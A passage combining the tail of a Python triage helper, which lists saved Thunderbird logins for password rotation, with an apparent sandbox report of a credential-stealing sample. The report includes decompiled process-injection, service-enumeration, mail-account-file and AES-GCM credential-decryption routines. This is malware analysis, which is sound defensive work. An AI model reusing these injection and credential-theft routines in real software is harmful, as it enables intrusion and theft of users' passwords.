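         "encryptedUsername": "ZXhhbXBsZS1ibG9iLTE=",   # placeholder, not a real NSS blob
         "encryptedPassword": "ZXhhbXBsZS1ibG9iLTI="},
        {"id": 2, "hostname": "smtp://smtp.example.com",
         "encryptedUsername": "ZXhhbXBsZS1ibG9iLTM=",
         "encryptedPassword": ""},                     # saved username only
    ],
}


def build_sample_profile() -> Path:
    """Write the constructed profile into a fresh temp directory and return its root."""
    root = Path(tempfile.mkdtemp(prefix="tb-triage-"))
    (root / "profiles.ini").write_text(SAMPLE_PROFILES_INI, encoding="utf-8")
    pdir = root / "Profiles" / "ab12cd34.default"
    pdir.mkdir(parents=True)
    (pdir / "logins.json").write_text(json.dumps(SAMPLE_LOGINS_JSON), encoding="utf-8")
    return root


if __name__ == "__main__":
    for pdir, logins in triage(build_sample_profile()).items():
        print(pdir)
        for rec in logins:
            print("   ", rec)
```

Point `triage()` at the real `%APPDATA%\Thunderbird` directory of an affected host to get the rotation list; anything the function returns is exactly what the sample's loop could have copied, so those accounts need new passwords regardless of whether the NSS decryption step succeeded in the sandbox.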

                                  C-Code - Quality: 83%
                                  			E00407B2E(long _a12) {
                                  				long _v8;
                                  				long _v12;
                                  				long _v16;
                                  				void* _v20;
                                  				long _v24;
                                  				signed int _t33;
                                  				void* _t37;
                                  				void* _t40;
                                  				long _t49;
                                  				_Unknown_base(*)()* _t64;
                                  				SIZE_T* _t69;
                                  				void* _t76;
                                  				void* _t80;
                                  				void* _t87;
                                  				void* _t91;
                                  
                                  				if( *0x426754 == 0) {
                                  					 *0x426754 = E0040FB98() != 0;
                                  				}
                                  				_t33 = OpenProcess(0x1fffff, 0, _a12);
                                  				_t91 = _t33;
                                  				if(_t91 != 0) {
                                  					_v12 = GetCurrentProcess();
                                  					if(E004121DC( &_v12) == 0) {
                                  						L15:
                                  						_t64 = VirtualAllocEx(_t91, 0, 0x100000, 0x3000, 0x40);
                                  						if(_t64 == 0) {
                                  							L23:
                                  							_push(0xfffffffe);
                                  							L24:
                                  							_pop(_t37);
                                  							return _t37;
                                  						}
                                  						_v24 = _v24 & 0x00000000;
                                  						VirtualProtectEx(_t91, _t64, 0x100000, 0x40,  &_v24);
                                  						_t40 = VirtualAllocEx(_t91, 0x33370000, 0x100, 0x3000, 0x40);
                                  						_v20 = _t40;
                                  						if(_t40 == 0) {
                                  							goto L23;
                                  						}
                                  						_v8 = _v8 & 0x00000000;
                                  						_t87 = "XXXXXX";
                                  						if(WriteProcessMemory(_t91, _v20, _t87, E00401133(_t87),  &_v8) == 0 || _v8 != E00401133(_t87)) {
                                  							L22:
                                  							_push(0xfffffffd);
                                  							goto L24;
                                  						} else {
                                  							_v12 = 0;
                                  							if(WriteProcessMemory(_t91, _t64, 0x41e6c0, 0x1d44,  &_v12) == 0 || _v12 != 0x1d44) {
                                  								goto L22;
                                  							} else {
                                  								return CreateRemoteThread(_t91, 0, 0, _t64, 0, 0, 0);
                                  							}
                                  						}
                                  					}
                                  					_t69 =  &_v12;
                                  					_v12 = _t91;
                                  					if(E004121DC(_t69) != 0) {
                                  						goto L15;
                                  					}
                                  					_push(_t69);
                                  					_push(_t69);
                                  					_t49 = E0040FBB4(_t91, 0x100000, 0, 0);
                                  					_v24 = _t49;
                                  					if(_t49 != 0 || 0x100000 != 0) {
                                  						_v12 = 0;
                                  						E0040FD0D(_t91, 0x100000, _t49, 0x100000,  &_v12,  &_v12);
                                  						_t76 = E0040FBB4(_t91, 0x100, 0x33370000, 0);
                                  						_v20 = _t76;
                                  						_v16 = 0x100;
                                  						if(_t76 != 0 || 0x100 != 0) {
                                  							_v8 = 0;
                                  							if(E0040FAE9(_t91, "XXXXXX", _v20, _v16, E00401133("XXXXXX"),  &_v8) == 0 || _v8 != E00401133("XXXXXX")) {
                                  								goto L22;
                                  							} else {
                                  								_t90 = _v24;
                                  								_v8 = _v8 & 0x00000000;
                                  								_t80 = _t91;
                                  								if(E0040FAE9(_t80, 0x41c2a8, _v24, 0x100000, 0x2412,  &_v8) == 0 || _v8 != 0x2412) {
                                  									goto L22;
                                  								} else {
                                  									MessageBoxA(0, "Injecting64", "Debug", 0);
                                  									_push(_t80);
                                  									_push(_t80);
                                  									asm("cdq");
                                  									return E0040FC62(0x41c2a8, _t91, 0x41c2a8, _t90, 0x100000);
                                  								}
                                  							}
                                  						} else {
                                  							goto L23;
                                  						}
                                  					} else {
                                  						goto L23;
                                  					}
                                  				} else {
                                  					return _t33 | 0xffffffff;
                                  				}
                                  			}

                                  APIs
                                  • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000,00000000,00000000), ref: 00407B59
                                    • Part of subcall function 0040FB98: GetCurrentProcess.KERNEL32(0042697C,00407B45,00000000,00000000,00000000), ref: 0040FB9D
                                    • Part of subcall function 0040FB98: IsWow64Process.KERNEL32(00000000), ref: 0040FBA4
                                    • Part of subcall function 0040FB98: GetProcessHeap.KERNEL32 ref: 0040FBAA
                                  • GetCurrentProcess.KERNEL32 ref: 00407B6D
                                    • Part of subcall function 004121DC: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?), ref: 004121F1
                                    • Part of subcall function 004121DC: GetProcAddress.KERNEL32(00000000), ref: 004121F8
                                  • MessageBoxA.USER32 ref: 00407C7D
                                  • VirtualAllocEx.KERNEL32(00000000,00000000,00100000,00003000,00000040), ref: 00407CAD
                                  • VirtualProtectEx.KERNEL32(00000000,00000000,00100000,00000040,00000000), ref: 00407CCA
                                  • VirtualAllocEx.KERNEL32(00000000,33370000,00000100,00003000,00000040), ref: 00407CE2
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,XXXXXX,00000000,00000000), ref: 00407D05
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,0041E6C0,00001D44,?), ref: 00407D30
                                  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407D4A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Virtual$AllocCurrentMemoryWrite$AddressCreateHandleHeapMessageModuleOpenProcProtectRemoteThreadWow64
                                  • String ID: Debug$Injecting64$XXXXXX
                                  • API String ID: 1574360354-2389424830
                                  • Opcode ID: 0e01dc1136dec1d6105c25c51067433d34393140dd2267df3ffc9b6bd3bf666a
                                  • Instruction ID: d433ea0d1c2d4f6ec0602b92d9002377d3576233aac0b38f39bcf27655b0c8a4
                                  • Opcode Fuzzy Hash: 0e01dc1136dec1d6105c25c51067433d34393140dd2267df3ffc9b6bd3bf666a
                                  • Instruction Fuzzy Hash: 21519271E04205BBEB21A7618C45FBF7A7DEF85714F20417EF500B22D0E7B8AA45866E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00413F7F(long __edx) {
                                  				void* _v8;
                                  				long _v12;
                                  				char _v268;
                                  				void _v272;
                                  				void* _t25;
                                  				void* _t27;
                                  				void* _t33;
                                  				void* _t37;
                                  
                                  				_t33 = OpenProcess(0x1fffff, 0, __edx);
                                  				_v8 = _t33;
                                  				_v272 = GetCurrentProcessId();
                                  				_t35 = E00401085(0xff);
                                  				GetModuleFileNameA(0, _t13, 0xff);
                                  				E004011A4( &_v268, _t35);
                                  				_t27 = VirtualAllocEx(_t33, 0, 0x800, 0x3000, 0x40);
                                  				WriteProcessMemory(_t33, _t27,  &E00426208, 0x800, 0);
                                  				_t5 =  &_v8; // 0x413f7a
                                  				VirtualProtectEx( *_t5, _t27, 0x800, 0x40,  &_v12);
                                  				_t37 = VirtualAllocEx(_v8, 0, 0x103, 0x3000, 4);
                                  				WriteProcessMemory(_v8, _t37,  &_v272, 0x103, 0);
                                  				_t9 = _t27 + 0x10e; // 0x10e
                                  				_t25 = CreateRemoteThread(_v8, 0, 0, _t9, _t37, 0, 0);
                                  				 *0x559cb4 = _t25;
                                  				return _t25;
                                  			}

                                  0x00413f99
                                  0x00413f9b
                                  0x00413fa9
                                  0x00413fb7
                                  0x00413fbc
                                  0x00413fca
                                  0x00413ff4
                                  0x00413ffe
                                  0x0041400c
                                  0x0041400f
                                  0x0041402a
                                  0x0041403c
                                  0x00414040
                                  0x0041404f
                                  0x00414057
                                  0x0041405e

                                  APIs
                                  • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000,74A313FB,00000000), ref: 00413F93
                                  • GetCurrentProcessId.KERNEL32 ref: 00413F9E
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,000000FF), ref: 00413FBC
                                  • VirtualAllocEx.KERNEL32(00000000,00000000,00000800,00003000,00000040), ref: 00413FE6
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,00426208,00000800,00000000), ref: 00413FFE
                                  • VirtualProtectEx.KERNEL32(z?A,00000000,00000800,00000040,?), ref: 0041400F
                                  • VirtualAllocEx.KERNEL32(?,00000000,00000103,00003000,00000004), ref: 00414026
                                  • WriteProcessMemory.KERNEL32(?,00000000,?,00000103,00000000), ref: 0041403C
                                  • CreateRemoteThread.KERNEL32(?,00000000,00000000,0000010E,00000000,00000000,00000000), ref: 0041404F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Virtual$AllocHeapMemoryWrite$AllocateCreateCurrentFileModuleNameOpenProtectRemoteThread
                                  • String ID: z?A
                                  • API String ID: 900395357-4280446894
                                  • Opcode ID: 39b68639bc109fc8f5c87fe2977afb9284191657715236c718eec5a075db1d2a
                                  • Instruction ID: b1c18d8d0f2f4188799d6c91686f228e56c1b6c845ed563d7edeb039f8378cf2
                                  • Opcode Fuzzy Hash: 39b68639bc109fc8f5c87fe2977afb9284191657715236c718eec5a075db1d2a
                                  • Instruction Fuzzy Hash: A1216F71644218BEF7209B51DC4AFEB7F7CEB44720F2041B6B604AA0D0DAF46E408AA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E0040D8FB(intOrPtr __ecx) {
                                  				char _v8;
                                  				signed int _v12;
                                  				char _v16;
                                  				char _v20;
                                  				short* _v24;
                                  				signed int _v28;
                                  				short** _v32;
                                  				short* _v36;
                                  				signed int _v40;
                                  				intOrPtr _v44;
                                  				intOrPtr* _t66;
                                  				char* _t69;
                                  				void* _t90;
                                  				intOrPtr* _t91;
                                  				intOrPtr _t92;
                                  				intOrPtr _t105;
                                  				intOrPtr* _t112;
                                  				intOrPtr _t113;
                                  				char _t114;
                                  				signed int _t115;
                                  				signed int _t116;
                                  				void* _t117;
                                  				void* _t119;
                                  
                                  				_t113 = __ecx;
                                  				_v44 = __ecx;
                                  				_v20 = 0;
                                  				_v16 = 0;
                                  				_v8 = 0;
                                  				_v24 = 0;
                                  				_v36 = 0;
                                  				_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
                                  				if(_t90 == 0) {
                                  					L9:
                                  					_v40 = _v40 & 0x00000000;
                                  					L10:
                                  					E00405FEB(_v24);
                                  					return _v40;
                                  				}
                                  				_v40 = 1;
                                  				_v32 = _t113 + 0x28;
                                  				while(1) {
                                  					L2:
                                  					_v16 = 0;
                                  					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, 0, 0,  &_v20,  &_v8,  &_v16, 0);
                                  					_t114 = _v20;
                                  					_t66 = E00406045(_t114);
                                  					_t112 = _t66;
                                  					_t69 =  &_v20;
                                  					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, _t112, _t114, _t69,  &_v8,  &_v16, 0);
                                  					if(_t69 == 0 && GetLastError() != 0xea) {
                                  						goto L9;
                                  					}
                                  					CloseServiceHandle(_t90);
                                  					_t115 = 0;
                                  					if(_v8 <= 0) {
                                  						goto L9;
                                  					}
                                  					_t91 = _t112;
                                  					while( *_t91 != 0) {
                                  						E004036F7( &_v12,  *_t91);
                                  						if(E0040335A( &_v12, _v32) != 0) {
                                  							_t116 = _t115 * 0x2c;
                                  							E00403549( &_v24, E004036F7( &_v28,  *((intOrPtr*)(_t116 + _t112))));
                                  							E00405FEB(_v28);
                                  							_t92 = _v44;
                                  							_v28 = _v28 & 0x00000000;
                                  							 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t116 + _t112 + 0x24));
                                  							E00405FEB(_v12);
                                  							_v12 = _v12 & 0x00000000;
                                  							if( *((intOrPtr*)(_t92 + 0x2c)) != 0) {
                                  								_t105 = _v8;
                                  								_t117 = 0;
                                  								if(_t105 == 0) {
                                  									goto L10;
                                  								}
                                  								while( *_t112 != 0) {
                                  									if( *((intOrPtr*)(_t112 + 0x24)) !=  *((intOrPtr*)(_t92 + 0x2c))) {
                                  										L21:
                                  										_t117 = _t117 + 1;
                                  										_t112 = _t112 + 0x2c;
                                  										if(_t117 < _t105) {
                                  											continue;
                                  										}
                                  										goto L10;
                                  									}
                                  									E004036F7( &_v12,  *_t112);
                                  									if(lstrcmpW(_v12, _v24) != 0) {
                                  										E004036F7(_t119,  *_t112);
                                  										E0040221A(_t92 + 0x44,  &_v12);
                                  									}
                                  									E00405FEB(_v12);
                                  									_v12 = _v12 & 0x00000000;
                                  									_t105 = _v8;
                                  									goto L21;
                                  								}
                                  								goto L10;
                                  							}
                                  							if(_v36 == 1) {
                                  								goto L9;
                                  							}
                                  							E0040D33C(_v32, 2);
                                  							E0040D3A8(_v32);
                                  							_v36 = 1;
                                  							E00401099(_t112);
                                  							_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
                                  							if(_t90 != 0) {
                                  								goto L2;
                                  							}
                                  							goto L9;
                                  						}
                                  						E00405FEB(_v12);
                                  						_v12 = _v12 & 0x00000000;
                                  						_t91 = _t91 + 0x2c;
                                  						_t115 = _t115 + 1;
                                  						if(_t115 < _v8) {
                                  							continue;
                                  						}
                                  						goto L9;
                                  					}
                                  					goto L9;
                                  				}
                                  				goto L9;
                                  			}

                                  0x0040d906
                                  0x0040d910
                                  0x0040d913
                                  0x0040d916
                                  0x0040d919
                                  0x0040d91c
                                  0x0040d91f
                                  0x0040d928
                                  0x0040d92c
                                  0x0040d9dc
                                  0x0040d9dc
                                  0x0040d9e0
                                  0x0040d9e3
                                  0x0040d9ef
                                  0x0040d9ef
                                  0x0040d935
                                  0x0040d93c
                                  0x0040d93f
                                  0x0040d93f
                                  0x0040d949
                                  0x0040d959
                                  0x0040d95f
                                  0x0040d964
                                  0x0040d96b
                                  0x0040d975
                                  0x0040d982
                                  0x0040d98a
                                  0x00000000
                                  0x00000000
                                  0x0040d99a
                                  0x0040d9a0
                                  0x0040d9a5
                                  0x00000000
                                  0x00000000
                                  0x0040d9a7
                                  0x0040d9a9
                                  0x0040d9b3
                                  0x0040d9c5
                                  0x0040d9f0
                                  0x0040da02
                                  0x0040da0a
                                  0x0040da0f
                                  0x0040da19
                                  0x0040da1d
                                  0x0040da20
                                  0x0040da25
                                  0x0040da2d
                                  0x0040da70
                                  0x0040da73
                                  0x0040da77
                                  0x00000000
                                  0x00000000
                                  0x0040da7d
                                  0x0040da8c
                                  0x0040dac9
                                  0x0040dac9
                                  0x0040daca
                                  0x0040dacf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040dad1
                                  0x0040da93
                                  0x0040daa6
                                  0x0040daad
                                  0x0040dab5
                                  0x0040dab5
                                  0x0040dabd
                                  0x0040dac2
                                  0x0040dac6
                                  0x00000000
                                  0x0040dac6
                                  0x00000000
                                  0x0040da7d
                                  0x0040da35
                                  0x00000000
                                  0x00000000
                                  0x0040da3d
                                  0x0040da43
                                  0x0040da49
                                  0x0040da4c
                                  0x0040da61
                                  0x0040da65
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040da6b
                                  0x0040d9ca
                                  0x0040d9cf
                                  0x0040d9d3
                                  0x0040d9d6
                                  0x0040d9da
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040d9da
                                  0x00000000
                                  0x0040d9a9
                                  0x00000000

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005), ref: 0040D922
                                  • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,?,?,?,00000000), ref: 0040D959
                                    • Part of subcall function 00406045: GetProcessHeap.KERNEL32(00000008,?,004030E2,00405B80,?,?,0041191C,00405B80,?,?,74A313FB,00000000,?,00405B80,00000000), ref: 00406048
                                    • Part of subcall function 00406045: HeapAlloc.KERNEL32(00000000,?,0041191C,00405B80,?,?,74A313FB,00000000,?,00405B80,00000000), ref: 0040604F
                                  • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,?,?,?,00000000), ref: 0040D982
                                  • GetLastError.KERNEL32 ref: 0040D98C
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D99A
                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,00000000,00000000), ref: 0040DA5B
                                  • lstrcmpW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0040DA9E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: EnumHeapManagerOpenServicesStatus$AllocCloseErrorHandleLastProcessServicelstrcmp
                                  • String ID: ServicesActive
                                  • API String ID: 4046592027-3071072050
                                  • Opcode ID: b633b8ffea87f903bef74cbbdf891376d23df45501ecfc6c39199a654e4b1ae1
                                  • Instruction ID: 4627b5c660ce4a60c95ced9edd5d001cb4fcdfcb4ede8c399349bdd6508d6144
                                  • Opcode Fuzzy Hash: b633b8ffea87f903bef74cbbdf891376d23df45501ecfc6c39199a654e4b1ae1
                                  • Instruction Fuzzy Hash: 85511CB1D00219AFDB15DFE1C896BEFBBB8AF18305F10017AE502B62D1DB785A45CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 88%
                                  			E00407D5E(void* __ecx, long __edx, long _a4) {
                                  				long _v8;
                                  				long _v12;
                                  				long _v16;
                                  				void* _v20;
                                  				void* _v24;
                                  				signed int _t17;
                                  				void* _t19;
                                  				void* _t22;
                                  				long _t32;
                                  				_Unknown_base(*)()* _t38;
                                  				void* _t40;
                                  
                                  				_t32 = __edx;
                                  				_v24 = __ecx;
                                  				if( *0x426754 == 0) {
                                  					 *0x426754 = E0040FB98() != 0;
                                  				}
                                  				_t17 = OpenProcess(0x1fffff, 0, _a4);
                                  				_t40 = _t17;
                                  				if(_t40 != 0) {
                                  					_t38 = VirtualAllocEx(_t40, 0, 0x100000, 0x3000, 0x40);
                                  					if(_t38 == 0) {
                                  						L12:
                                  						_push(0xfffffffe);
                                  						L13:
                                  						_pop(_t19);
                                  						L14:
                                  						return _t19;
                                  					}
                                  					_v16 = _v16 & 0x00000000;
                                  					VirtualProtectEx(_t40, _t38, 0x100000, 0x40,  &_v16);
                                  					_t22 = VirtualAllocEx(_t40, 0x33370000, 0x100, 0x3000, 0x40);
                                  					_v20 = _t22;
                                  					if(_t22 == 0) {
                                  						goto L12;
                                  					}
                                  					_v8 = _v8 & 0x00000000;
                                  					if(WriteProcessMemory(_t40, _v20, "XXXXXX", E00401133("XXXXXX"),  &_v8) == 0 || _v8 != E00401133("XXXXXX")) {
                                  						L11:
                                  						_push(0xfffffffd);
                                  						goto L13;
                                  					} else {
                                  						_v12 = _v12 & 0x00000000;
                                  						if(WriteProcessMemory(_t40, _t38, _v24, _t32,  &_v12) == 0 || _v12 != _t32) {
                                  							goto L11;
                                  						} else {
                                  							_t19 = CreateRemoteThread(_t40, 0, 0, _t38, 0, 0, 0);
                                  							goto L14;
                                  						}
                                  					}
                                  				} else {
                                  					return _t17 | 0xffffffff;
                                  				}
                                  			}

                                  0x00407d6d
                                  0x00407d6f
                                  0x00407d72
                                  0x00407d7b
                                  0x00407d7b
                                  0x00407d8c
                                  0x00407d92
                                  0x00407d96
                                  0x00407db6
                                  0x00407dba
                                  0x00407e5f
                                  0x00407e5f
                                  0x00407e61
                                  0x00407e61
                                  0x00407e62
                                  0x00000000
                                  0x00407e62
                                  0x00407dc0
                                  0x00407dd1
                                  0x00407de9
                                  0x00407def
                                  0x00407df4
                                  0x00000000
                                  0x00000000
                                  0x00407df6
                                  0x00407e1b
                                  0x00407e5b
                                  0x00407e5b
                                  0x00000000
                                  0x00407e2d
                                  0x00407e2d
                                  0x00407e43
                                  0x00000000
                                  0x00407e4a
                                  0x00407e53
                                  0x00000000
                                  0x00407e53
                                  0x00407e43
                                  0x00407d98
                                  0x00000000
                                  0x00407d98

                                  APIs
                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?), ref: 00407D8C
                                    • Part of subcall function 0040FB98: GetCurrentProcess.KERNEL32(0042697C,00407B45,00000000,00000000,00000000), ref: 0040FB9D
                                    • Part of subcall function 0040FB98: IsWow64Process.KERNEL32(00000000), ref: 0040FBA4
                                    • Part of subcall function 0040FB98: GetProcessHeap.KERNEL32 ref: 0040FBAA
                                  • VirtualAllocEx.KERNEL32(00000000,00000000,00100000,00003000,00000040,00000000), ref: 00407DB0
                                  • VirtualProtectEx.KERNEL32(00000000,00000000,00100000,00000040,00000000), ref: 00407DD1
                                  • VirtualAllocEx.KERNEL32(00000000,33370000,00000100,00003000,00000040), ref: 00407DE9
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,XXXXXX,00000000,00000000), ref: 00407E13
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407E3B
                                  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407E53
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Virtual$AllocMemoryWrite$CreateCurrentHeapOpenProtectRemoteThreadWow64
                                  • String ID: XXXXXX
                                  • API String ID: 813767414-582547948
                                  • Opcode ID: b37eab9ef3b4ace79a3b066072094820bbd7040eabfb987d4398ce6d9e516cc8
                                  • Instruction ID: c495f5495fef9a669d461779a70b0afaaa39668d7629f65417ca4a490480110a
                                  • Opcode Fuzzy Hash: b37eab9ef3b4ace79a3b066072094820bbd7040eabfb987d4398ce6d9e516cc8
                                  • Instruction Fuzzy Hash: 26219371A49205BAEB2157A0DC05FBF7A7CAF44B55F2041B6FA10F11D0D7B8AE0086BE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040955B(intOrPtr __ecx) {
                                  				char _v272;
                                  				struct _WIN32_FIND_DATAA _v592;
                                  				char _v856;
                                  				char _v1120;
                                  				intOrPtr _t31;
                                  				void* _t36;
                                  
                                  				_t31 = __ecx;
                                  				GetFullPathNameA(0x426760, 0x104,  &_v856, 0);
                                  				PathCombineA( &_v1120,  &_v856, "*");
                                  				_t36 = FindFirstFileA( &_v1120,  &_v592);
                                  				if(_t36 != 0xffffffff) {
                                  					do {
                                  						if((_v592.dwFileAttributes | 0x00000010) == 0x10 && _v592.cFileName != 0x2e) {
                                  							PathCombineA( &_v272, 0x426760,  &(_v592.cFileName));
                                  							PathCombineA( &_v272,  &_v272, "Accounts\\Account.rec0");
                                  							E00409244(_t31,  &_v272);
                                  						}
                                  					} while (FindNextFileA(_t36,  &_v592) != 0);
                                  				}
                                  				return 0;
                                  			}

                                  0x0040957a
                                  0x0040957c
                                  0x0040959b
                                  0x004095b1
                                  0x004095b6
                                  0x004095b8
                                  0x004095c4
                                  0x004095e2
                                  0x004095f1
                                  0x004095fc
                                  0x004095fc
                                  0x0040960f
                                  0x004095b8
                                  0x00409619

                                  APIs
                                  • GetFullPathNameA.KERNEL32(00426760,00000104,?,00000000), ref: 0040957C
                                  • PathCombineA.SHLWAPI(?,?,00418F18), ref: 0040959B
                                  • FindFirstFileA.KERNEL32(?,?), ref: 004095AB
                                  • PathCombineA.SHLWAPI(?,00426760,0000002E), ref: 004095E2
                                  • PathCombineA.SHLWAPI(?,?,Accounts\Account.rec0), ref: 004095F1
                                    • Part of subcall function 00409244: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00409261
                                    • Part of subcall function 00409244: GetLastError.KERNEL32 ref: 0040926E
                                    • Part of subcall function 00409244: CloseHandle.KERNEL32(00000000), ref: 00409275
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00409609
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Path$CombineFile$Find$CloseCreateErrorFirstFullHandleLastNameNext
                                  • String ID: .$Accounts\Account.rec0
                                  • API String ID: 3873318193-2526347284
                                  • Opcode ID: e3be3eae2ca6ed700056314c56cb9799dab408cb93910242309d82db515b9b61
                                  • Instruction ID: bc3515f8d3d8780f40bb8a30baa7d5921dca78d5fe5a5665ce25a30cdb5b99d6
                                  • Opcode Fuzzy Hash: e3be3eae2ca6ed700056314c56cb9799dab408cb93910242309d82db515b9b61
                                  • Instruction Fuzzy Hash: A71142B2A0022C6BDB20D7A4DC89FEB777CEB45714F5045E7E505E3181E7789E888E68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,?,00000000,?,?,?,0040C1C4,?), ref: 0040C436
                                  • BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,0040C1C4,?), ref: 0040C44F
                                  • BCryptGenerateSymmetricKey.BCRYPT(00000020,0040C1C4,00000000,00000000,?,00000020,00000000,?,0040C1C4,?), ref: 0040C464
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Crypt$AlgorithmGenerateOpenPropertyProviderSymmetric
                                  • String ID: AES$ChainingMode$ChainingModeGCM
                                  • API String ID: 1692524283-1213888626
                                  • Opcode ID: dcef71b3dcc6bd3a3947520fdd90713a2cd90525b873c444abc0fdd3c8c30a01
                                  • Instruction ID: c2b106cd844a06e10b1a571c349fc797866018eb450a69ea0d76d9719a4b7e57
                                  • Opcode Fuzzy Hash: dcef71b3dcc6bd3a3947520fdd90713a2cd90525b873c444abc0fdd3c8c30a01
                                  • Instruction Fuzzy Hash: 2FF06871345325BFDB240B56DC49ED7BFACEF5AB91B10413AF905E1150D6B15C00D6A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E0040C6BD(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                  				char _v10;
                                  				char _v12;
                                  				long _v16;
                                  				char _v20;
                                  				intOrPtr _v60;
                                  				intOrPtr _v64;
                                  				intOrPtr _v76;
                                  				intOrPtr _v80;
                                  				intOrPtr _v84;
                                  				int _v88;
                                  				void* _t36;
                                  				long _t50;
                                  				void* _t54;
                                  				int _t61;
                                  				void* _t63;
                                  				void* _t73;
                                  				void* _t74;
                                  				void* _t75;
                                  				void* _t76;
                                  				void* _t77;
                                  
                                  				_t63 = __ecx;
                                  				_t73 = __edx;
                                  				_v12 = 0x3176;
                                  				_v10 = 0x30;
                                  				_t75 = __ecx;
                                  				if(__edx < 3) {
                                  					L8:
                                  					_push(_t63);
                                  					_push( &_v16);
                                  					_push( &_v20);
                                  					_t36 = E0040C1DD(_t75, _t73, __eflags);
                                  					__eflags = _t36;
                                  					if(_t36 != 0) {
                                  						_t76 = E00401085(_v16 + 1);
                                  						__eflags = _v16 + 1;
                                  						E00401052(_t76, 0, _v16 + 1);
                                  						E0040102C(_t76, _v20, _v16);
                                  						_push(_v20);
                                  						goto L10;
                                  					}
                                  				} else {
                                  					_t36 = E00401000(__ecx,  &_v12, 3);
                                  					_t77 = _t77 + 0xc;
                                  					if(_t36 != 0) {
                                  						goto L8;
                                  					} else {
                                  						if(_a4 != _t36 && _a8 != _t36) {
                                  							_t61 = 0x40;
                                  							E00401052( &_v88, _t36, _t61);
                                  							_t7 = _t75 + 3; // 0x3
                                  							_v88 = _t61;
                                  							_v80 = _t7;
                                  							_t10 = _t73 - 0x10; // -16
                                  							_v84 = 1;
                                  							_v76 = 0xc;
                                  							_v64 = _t10 + _t75;
                                  							_t14 = _t73 - 0x1f; // -31
                                  							_t50 = _t14;
                                  							_v60 = 0x10;
                                  							_v16 = _t50;
                                  							_t36 = LocalAlloc(_t61, _t50);
                                  							_t74 = _t36;
                                  							if(_t74 != 0) {
                                  								_t54 = _v80 + _v76;
                                  								__imp__BCryptDecrypt(_a8, _t54, _v16,  &_v88, 0, 0, _t74, _v16,  &_v16, 0);
                                  								if(_t54 != 0) {
                                  									return 0x418fe6;
                                  								}
                                  								_t76 = E00401085(_v16 + 1);
                                  								E00401052(_t76, 0, _v16 + 1);
                                  								E0040102C(_t76, _t74, _v16);
                                  								_push(_t74);
                                  								L10:
                                  								LocalFree();
                                  								return _t76;
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t36;
                                   			}

                                   Instruction addresses for the decompiled lines above (address column flattened by extraction): 0x0040c6bd to 0x0040c807

                                  APIs
